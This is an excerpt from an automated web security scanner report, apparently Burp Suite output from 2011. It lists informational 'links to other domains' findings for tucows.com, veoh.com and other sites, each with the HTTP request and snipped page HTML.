...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl05_Hyperlink6" href="http://bt.base0.net/">Base0.net Torrents</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl06_Hyperlink5" href="http://geocities.com/chocobo_no_miko/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fgeocities.com%2fchocobo_no_miko%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl06_Hyperlink6" href="http://geocities.com/chocobo_no_miko/">Chocobo_no_miko's Streamload Site</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl07_Hyperlink5" href="http://www.dattebayo.com/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fwww.dattebayo.com%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl07_Hyperlink6" href="http://www.dattebayo.com/">Dattebayo Fansubs</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl08_Hyperlink5" href="http://www.directmanga.com/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fwww.directmanga.com%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl08_Hyperlink6" href="http://www.directmanga.com/">Direct Manga</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl09_Hyperlink5" href="http://www.fansub.tv/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fwww.fansub.tv%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl09_Hyperlink6" href="http://www.fansub.tv/">Fansub TV</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl10_Hyperlink5" href="http://www.kyotoanime.net/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fwww.kyotoanime.net%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl10_Hyperlink6" href="http://www.kyotoanime.net/">KyotoAnime Community</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl11_Hyperlink5" href="http://otaku-request.bravepages.com/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fotaku-request.bravepages.com%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl11_Hyperlink6" href="http://otaku-request.bravepages.com/">Otaku Request</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl12_Hyperlink5" href="http://www.otakusavior.com/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fwww.otakusavior.com%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl12_Hyperlink6" href="http://www.otakusavior.com/">Otaku Savior</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl13_Hyperlink5" href="http://precociousgamine.deep-ice.com/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fprecociousgamine.deep-ice.com%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl13_Hyperlink6" href="http://precociousgamine.deep-ice.com/">Precocious Gamine</a>
...[SNIP]...
<td align="center" height="100" width="130">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl14_Hyperlink5" href="http://www.z4znet.com/">
                                           <img border="1" align="left" src='http://open.thumbshots.org/image.aspx?url=http%3a%2f%2fwww.z4znet.com%2f' alt="Preview by Thumbshots.org" />
...[SNIP]...
<td valign="top">
                   <a id="dnn_ctr446_ViewThumbshotsNetWebGuideLinks_LinksDataList_ctl14_Hyperlink6" href="http://www.z4znet.com/">Zero4Zero Network</a>
...[SNIP]...
<noscript>
   <a href="http://seomon.com/" target="_top" title="Free Search Engine Marketing Company"><img src="http://seomon.com/prgigbyiybhihoip387308.gif?njs=1" alt="Web Monitoring" border="0" height="83" width="88"></a>
...[SNIP]...
</p>
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...
<noscript>Get the <a href="http://www.widgetbox.com/widget/youtube-broadcast-yourself-smartdevil">YouTube            - Broadcast Yourself.</a> widget and many other <a href="http://www.widgetbox.com/">great free widgets</a> at <a href="http://www.widgetbox.com">Widgetbox</a>! Not seeing a widget? (<a href="http://docs.widgetbox.com/using-widgets/installing-widgets/why-cant-i-see-my-widget/">More info</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

18.134. http://www.tucows.com/software.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /software.html?t=689&pf=win HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<li class="bt6"><a href="http://mobile.butterscotch.com/?src=tcv3mobile" target="_blank"></a></li>
<li class="bt7"><a href="http://www.butterscotch.com//free-software.html?src=tcv3freeware" target="_blank"></a></li>
<li class="bt8"><a href="http://www.butterscotch.com/?src=tcv3video" target="_blank"></a>
...[SNIP]...
</a>
<a href="http://www.butterscotch.com/free-software.html?src=software" target="_blank" class="linkOrange f15">Browse more <b>
...[SNIP]...
</a>
<a href="http://www.butterscotch.com/help/security?src=software" target="_blank" class="linkOrange f15">Browse more <b>
...[SNIP]...
<div id="cartouche" class="cartouchecontainer">
<a href="http://www.butterscotch.com/"><div class="cartoucheheader">
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/How-To-Install-Blu-Ray-Software?src=splr"><strong>
...[SNIP]...
<p>
In order to get the full Blu-ray experience you'll need to install the appropriate software. We show you how to do that in this episode.
<a href="http://www.butterscotch.com/tutorial/How-To-Install-Blu-Ray-Software?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/How-To-Install-Blu-Ray-Software?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Get-Directions-And-Check-Traffic?src=splr"><strong>
...[SNIP]...
<p>
Not only does the Bing iPhone application allow you to view maps, you can also use it to check traffic in your area.
<a href="http://www.butterscotch.com/tutorial/Get-Directions-And-Check-Traffic?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Get-Directions-And-Check-Traffic?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-A-Notebook-Computer?src=splr"><strong>
...[SNIP]...
<p>
Now that we've shown you how to add Blu-ray to a desktop computer we'll show you how to add Blu-ray to your notebook.
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-A-Notebook-Computer?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-A-Notebook-Computer?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Bing-Photo-Search?src=splr"><strong>
...[SNIP]...
<p>
The Bing iPhone app makes it easy to find whatever photos you're interested in. We'll show you how in this episode.
<a href="http://www.butterscotch.com/tutorial/Bing-Photo-Search?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Bing-Photo-Search?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-Your-Desktop-Computer?src=splr"><strong>
...[SNIP]...
<p>
Here we show you how to add a Blu-ray drive to your desktop computer and tell you what you'll need in your system to make it work.
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-Your-Desktop-Computer?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Adding-Blu-Ray-To-Your-Desktop-Computer?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Finding-Flight-Information-On-Bing?src=splr"><strong>
...[SNIP]...
<p>
The Bing iPhone application makes it easy to find deals on flights from your local airport or check the status on a specific flight.
<a href="http://www.butterscotch.com/tutorial/Finding-Flight-Information-On-Bing?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Finding-Flight-Information-On-Bing?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/What-Is-Blu-Ray?src=splr"><strong>
...[SNIP]...
<p>
In our first episode of this series, we'll tell you what exactly Blu-ray is and what it is used for.
<a href="http://www.butterscotch.com/tutorial/What-Is-Blu-Ray?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/What-Is-Blu-Ray?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/How-Do-I-Use-Blu-Ray-?src=splr"><strong>
...[SNIP]...
<p>
In this series we tell you what Blu-ray is and show you how to add Blu-ray drives to your computer and how to burn Blu-ray discs.
<a href="http://www.butterscotch.com/tutorial/How-Do-I-Use-Blu-Ray-?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/How-Do-I-Use-Blu-Ray-?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bluray1.jpg" height=84 width=84 alt="How do I - Use Blu-ray" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Customizing-Your-Bookmarks?src=splr"><strong>
...[SNIP]...
<p>
Here we show you how to customize the bookmarks that appear in your Bing iPhone application.
<a href="http://www.butterscotch.com/tutorial/Customizing-Your-Bookmarks?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Customizing-Your-Bookmarks?src=splr"><img src="http://www-s.butterscotch.com/uplassets/bing1.jpg" height=84 width=84 alt="Top Secrets - Bing iPhone app" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/tutorial/Shoot-And-Edit-Video-On-The-IPhone-4?src=splr"><strong>
...[SNIP]...
rs runs through all the steps in shooting and editing together great videos using the cameras on the iPhone 4 from the first time you hit the record button to the finished, polished end product.
<a href="http://www.butterscotch.com/tutorial/Shoot-And-Edit-Video-On-The-IPhone-4?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/tutorial/Shoot-And-Edit-Video-On-The-IPhone-4?src=splr"><img src="http://www-s.butterscotch.com/uplassets/iphone1.png" height=84 width=84 alt="How Do I Shoot video with the iPhone 4" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Searching-And-Saving-Topics?src=splr"><strong>
...[SNIP]...
<p>
You can search for topics on Hootsuite much like you can on Twitter and you can save your searches for later reference.
<a href="http://www.butterscotch.com/show/Searching-And-Saving-Topics?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Searching-And-Saving-Topics?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Ok-Go-Doing-Away-With-Big-Labels-And-Turning-To-Social-Media?src=splr"><strong>
...[SNIP]...
its own entity and its own task master is indy in the purest sense. Rather than toiling away in obscurity though, the band has harnessed social media like no other, selling over 600,000 records.
<a href="http://www.butterscotch.com/show/Ok-Go-Doing-Away-With-Big-Labels-And-Turning-To-Social-Media?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Ok-Go-Doing-Away-With-Big-Labels-And-Turning-To-Social-Media?src=splr"><img src="http://www-s.butterscotch.com/uplassets/SU_Artwork_84x84.jpg" height=84 width=84 alt="Status Update" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/GV-Mobile-For-IPhone-Review?src=splr"><strong>
...[SNIP]...
<p>
We take a minute to show you GV Mobile+, an app that allows iPhone users to access Google Voice through their phone.
<a href="http://www.butterscotch.com/show/GV-Mobile-For-IPhone-Review?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/GV-Mobile-For-IPhone-Review?src=splr"><img src="http://www-s.butterscotch.com/uplassets/60-sec-84.jpg" height=84 width=84 alt="60-Second App - Apple" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Adding-Your-Twitter-Lists-To-Hootsuite?src=splr"><strong>
...[SNIP]...
<p>
If you use lists in your Twitter account then you'll be pleased to know that you can use them when you use Hootsuite as well.
<a href="http://www.butterscotch.com/show/Adding-Your-Twitter-Lists-To-Hootsuite?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Adding-Your-Twitter-Lists-To-Hootsuite?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Convert-Video-To-IPad-Format-With-Amediasoft?src=splr"><strong>
...[SNIP]...
<p>
Amediasoft's iPad Video Converter does just what the name says: it converts video from just about any format you can throw at it into an iPad compatible file format.
<a href="http://www.butterscotch.com/show/Convert-Video-To-IPad-Format-With-Amediasoft?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Convert-Video-To-IPad-Format-With-Amediasoft?src=splr"><img src="http://www-s.butterscotch.com/uplassets/MsDownload_AlbumArt_84.jpg" height=84 width=84 alt="Miss Download" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Lego-Creationary-For-IPad-Review-?src=splr"><strong>
...[SNIP]...
<p>
We review the Lego Creationary app for the iPad, the game that challenges you to guess what Lego structures are being built before they are completed.
<a href="http://www.butterscotch.com/show/Lego-Creationary-For-IPad-Review-?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Lego-Creationary-For-IPad-Review-?src=splr"><img src="http://www-s.butterscotch.com/uplassets/60-sec-84.jpg" height=84 width=84 alt="60-Second App - Apple" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Organizing-Your-Streams?src=splr"><strong>
...[SNIP]...
<p>
With your social networking accounts added to Hootsuite, you'll next want to organize the components of each account into the order that is most comfortable for you to read.
<a href="http://www.butterscotch.com/show/Organizing-Your-Streams?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Organizing-Your-Streams?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Robots-Robots-Robots-At-CES-2011?src=splr"><strong>
...[SNIP]...
er Electronics Show in search of robots to do our bidding...with the help of Andrew Moore-Crispin and Kate Abraham, we find more cleaning robots , robots that will make things for us, robots tha
<a href="http://www.butterscotch.com/show/Robots-Robots-Robots-At-CES-2011?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Robots-Robots-Robots-At-CES-2011?src=splr"><img src="http://www-s.butterscotch.com/uplassets/labrats84.png" height=84 width=84 alt="Lab Rats" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/TyPad-Bluetooth-Keyboard-For-IPad-Video-Review?src=splr"><strong>
...[SNIP]...
eyboards for Apple's iconic iPad abound. Some get it right, some get it very wrong and some fall in the middle ground. We take a look at one of the latter, the tyPad Bluetooth keyboard for iPad.
<a href="http://www.butterscotch.com/show/TyPad-Bluetooth-Keyboard-For-IPad-Video-Review?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/TyPad-Bluetooth-Keyboard-For-IPad-Video-Review?src=splr"><img src="http://www-s.butterscotch.com/uplassets/TheSweetStuff_AlbumArt_yellow-84.png" height=84 width=84 alt="Gadget TV" /></a>
...[SNIP]...
<div class="cartouche_content">
<a href="http://www.butterscotch.com/show/Connecting-To-Your-Accounts?src=splr"><strong>
...[SNIP]...
<p>
In order to use Hootsuite properly you'll need to connect with your social networking accounts. We show you how to do that in this episode.
<a href="http://www.butterscotch.com/show/Connecting-To-Your-Accounts?src=splr">view it</a>
...[SNIP]...
</div>
<a href="http://www.butterscotch.com/show/Connecting-To-Your-Accounts?src=splr"><img src="http://www-s.butterscotch.com/uplassets/hootsuite1.jpg" height=84 width=84 alt="Hootsuite for iPhone" /></a>
...[SNIP]...
<div class="cartouchebottom">
<a href="http://www.butterscotch.com/">Browse more tasty tech &gt;&gt;</a>
...[SNIP]...
</a> |
<a href="http://www.tucowsinc.com/careers/">Jobs</a> |
<a href="http://www.tucowsinc.com/">Services</a>
...[SNIP]...
</a> |
<a href="http://www.butterscotch.com/">butterscotch.com </a>
...[SNIP]...
<div class="footer_right">
<a href="http://www.flickr.com/search/?q=squishycow" target="_blank"><img style="border: none;" src="images/newassets/footer_logo.gif" height=53 width=56 alt="Cows" />
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

18.135. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3digxLTa3XKZOdgQfJltnlDw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CF0QuAIwCQ\\x26amp;q\\x3dsmartdesis\\x26amp;usg\\x3dAFQjCNGfJXOedr8EFUHoDTuNwPlaSxDDIA\\x22\\x3e\\x3cdiv HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<li id="nav-twitter">
               <a title="Twitter" href="http://www.twitter.com/veoh" target="_blank" onclick="trackClickInGA('/homepage/twitter');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-twitter.png" />
...[SNIP]...
<li id="nav-facebook">
               <a title="Facebook" href="http://www.facebook.com/pages/Veoh/129836657035793" target="_blank" onclick="trackClickInGA('/homepage/facebook');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-facebook.png" />
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768465"></script>
...[SNIP]...
</span>
       <a class="button sp_button-blue" href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"><span>
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Action-Anime">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.2c603d6edb9e44339cf5a82943ef8b04.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Horror-Movies">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.9d76b62635aa43948f525b2cc46e8958.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/MitchRider">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.1e075a3674f74e27a7cb4808ae42d91f.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
</a>
           <a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8" target="_blank" class="icon sp_facebook" title="Share on Facebook"></a>
           <a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&t=Magadheera+SmartDesis.TK.mp4&c=action" class="icon sp_myspace" target="_blank" title="Share on MySpace"></a>
           <a href="http://twitter.com/home?status=Watch: http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8" class="icon sp_twitter" target="_blank" title="Share on Twitter"></a>
...[SNIP]...
<div id="moreShareIcons" class="hide">
               <a href="http://digg.com/submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&bodytext=action&media=video&topic=movies" target="_blank" title="Digg This" class="icon sp_digg"></a>
               <a href="http://delicious.com/save?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&notes=action" target="_blank" title="Save a Bookmark on Delicious" class="icon sp_delicious"></a>
               <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4" target="_blank" title="Stumble it" class="icon sp_stumbleupon"></a>
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Action-Anime">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.2c603d6edb9e44339cf5a82943ef8b04.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Horror-Movies">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.9d76b62635aa43948f525b2cc46e8958.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/MitchRider">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.1e075a3674f74e27a7cb4808ae42d91f.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Upcoming-Movies">
<img src="http://static.qlipso.com/share/Resources/0/5/193/RoomThumb.5193736.2c5c689b2f5f45368a9547702fc35410.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<li><a id="footer-twitter" href="http://www.twitter.com/veoh" title="Twitter">Twitter</a>
...[SNIP]...
<li><a href="http://veoh.tv/ccjjew">Feedback</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript>
